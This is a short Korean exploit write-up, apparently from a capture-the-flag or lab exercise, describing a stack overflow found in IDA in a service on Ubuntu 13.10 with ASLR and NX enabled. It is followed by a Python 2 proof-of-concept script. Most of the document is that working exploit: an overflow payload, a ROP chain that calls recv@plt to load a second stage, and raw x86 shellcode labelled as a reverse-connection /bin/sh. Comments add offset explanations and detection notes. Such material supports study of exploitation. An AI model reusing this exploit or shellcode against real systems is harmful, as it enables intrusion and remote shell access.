환경: Ubuntu 13.10 / ASLR, NX on
IDA로 분석하던 중 저렇게 stack overflow가 나는 부분을 발견하였다.
a5는 약 400바이트가 넘어가는 값이다.
dest가 흘러넘치게 된다.
#!/usr/bin/python
# Proof-of-concept for the stack overflow described in the write-up above.
# Written for Python 2: str literals are raw bytes, so the shellcode and
# payload strings are handed to send() as-is (under Python 3 every send()
# call below would raise TypeError because str is not a bytes-like object).
from socket import *
from struct import *
# Connect to the vulnerable service listening on the local host, port 8888.
s=socket(AF_INET,SOCK_STREAM)
s.connect(('127.0.0.1',8888))
# p(): pack an integer as a 32-bit little-endian value (x86 stack word).
p=lambda x:pack("<I",x)
# Stage-2 payload: raw 32-bit x86 Linux shellcode (int 0x80 syscalls), labelled
# by the author as a connect-back /bin/sh. Kept verbatim from the post; it is
# never sent as part of the overflow itself (see the second send() below).
shellcode = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e" #reverse connection /bin/sh
shellcode += "\x68\x00\x00\x00\x00\x66\x68\x7a\x69\x66\x53\x6a\x10\x51\x50\x89\xe1"
shellcode += "\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50"
shellcode += "\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
# Number of filler bytes between the start of the overflowed buffer (dest in
# the write-up) and the saved return address — offset taken from the author's
# IDA analysis, not derived here.
dummysize=240
# Fixed addresses as given in the post. All are 0x0804xxxx values, i.e. the
# binary presumably is not PIE, which is why ASLR (on, per the environment
# note) does not move the PLT entry or the gadget — building with PIE would.
custom_stack=0x0804b80   # address where the second recv() stores the shellcode
recv_plt=0x08048780      # recv@plt: reused to read stage 2 into custom_stack
pppr=0x804947d           # pop;pop;pop;ret gadget: discards recv()'s three args
# Overflow layout (stage 1):
#   [240 x NOP][recv@plt][pppr][fd=4][custom_stack][len(shellcode)]
# After the overwritten return address jumps to recv@plt, recv() takes its
# return address (pppr) and the next three words as arguments; fd 4 is
# presumably the server's accepted client socket — confirm against the binary.
# Note that recv() is given only three arguments here; its fourth (flags)
# is whatever word happens to follow on the stack.
payload = ""
payload += "\x90"*dummysize
payload += p(recv_plt)
payload += p(pppr)
payload += p(4)
payload += p(custom_stack)
payload += p(len(shellcode))
# Consume the service prompt/banner (contents are not checked).
s.recv(1024)
# The service's "write" command carries the oversized argument (a5 in the
# write-up). From the defender's side this request is easy to recognise:
# a short command word followed by a run of 0x90 bytes and binary addresses,
# far longer than any legitimate argument — input-length validation on the
# server, or a length/byte-class rule in an IDS, would catch it.
s.send("write "+payload)
s.recv(1024)
# Stage 2: this send() satisfies the recv() queued by the ROP chain, landing
# the shellcode at custom_stack. With NX on (environment note) code placed
# in a data region should not be executable unless that mapping is RWX —
# worth verifying in the binary's section permissions.
s.send(shellcode)
s.close()
pwned!!